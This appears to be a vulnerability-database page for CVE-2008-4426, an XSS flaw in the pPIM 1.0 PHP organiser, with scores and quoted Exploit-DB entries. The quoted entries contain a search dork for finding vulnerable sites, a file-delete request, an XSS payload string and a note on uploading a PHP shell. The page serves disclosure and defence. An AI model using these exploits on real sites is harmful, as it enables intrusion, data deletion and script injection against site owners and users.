CVE-2008-4426
published 2008-10-03CVE-2008-4426: Cross-site scripting (XSS) vulnerability in events.php in Phlatline's Personal Information Manager (pPIM) 1.0 allows remote attackers to inject arbitrary web…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.60%
72.8th percentile
Cross-site scripting (XSS) vulnerability in events.php in Phlatline's Personal Information Manager (pPIM) 1.0 allows remote attackers to inject arbitrary web script or HTML via the date parameter in a new action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phlatline | personal_information_manager | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
pPIM 1.0 - Multiple Vulnerabilities
exploitdb·2009-02-25
CVE-2008-4528 pPIM 1.0 - Multiple Vulnerabilities
pPIM 1.0 - Multiple Vulnerabilities
---
- -= pPIM Multiple Vulnerabilities =-
Version Tested: pPIM 1.0
Vendor notified
Full details can also be found at http://www.lampsecurity.org/node/18
Author: Justin C. Klein Keane
Description
pPIM (http://www.phlatline.org/index.php?page=prod-ppim) is a Personal
Information Management application written in PHP that can store
contacts (including their photos), events, links, notes, send and check
email, and upload files. pPIM came to my attention recently with the
publishing on Milw0rm of exploit code designed to facilitate remote
command execution (http://www.milw0rm.com/exploits/8093). As there is a
milw0rm exploit already posted it is likely malicious users are already
exploiting pPIM. I decided to have a closer look at pPIM and, quite
frankly
Exploit-DB
pPIM 1.0 - Upload/Change Password
exploitdb·2008-08-11
CVE-2008-4528 pPIM 1.0 - Upload/Change Password
pPIM 1.0 - Upload/Change Password
---
Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities
cript : Ppim v1.0
Download : http://scripts.ringsworld.com/organizers/ppim.zip
By Stack
Poc 1: change password
for change password go to this link
http://localhost/ppim/changepassword.php
writhe your password and confirm it
Poc 2 : upload
http://localhost/ppim/upload.php
you can upload you php shell in this link
after you go here
http://localhost/ppim/shell.php
# milw0rm.com [2008-08-11]
Exploit-DB
pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting
exploitdb·2008-08-10
CVE-2008-4528 pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting
pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting
---
##########################################################
#Author : BeyazKurt
#Contact : [email protected]
#
#Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ]
#Download : http://scripts.ringsworld.com/organizers/ppim.zip
#
# D0rk : inurl:events.php?listallevents
#
# File Delete Vulnerability: upload.php
#
# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx
# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName
#
# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#
# XSS Vulnerability: events.php
#
#[CODE]
# New Event";
# }
# ?>
#[/CODE]
#
#Exploit :
# events.php?mode=new&date=XSS CODE
# events.php?mode=new&date=">alert('XSS')
# -------------------------------
#
#
No writeups or analysis indexed.
http://secunia.com/advisories/31424http://securityreason.com/securityalert/4348http://www.securityfocus.com/bid/30627https://exchange.xforce.ibmcloud.com/vulnerabilities/44388https://www.exploit-db.com/exploits/6215http://secunia.com/advisories/31424http://securityreason.com/securityalert/4348http://www.securityfocus.com/bid/30627https://exchange.xforce.ibmcloud.com/vulnerabilities/44388https://www.exploit-db.com/exploits/6215
2008-10-03
Published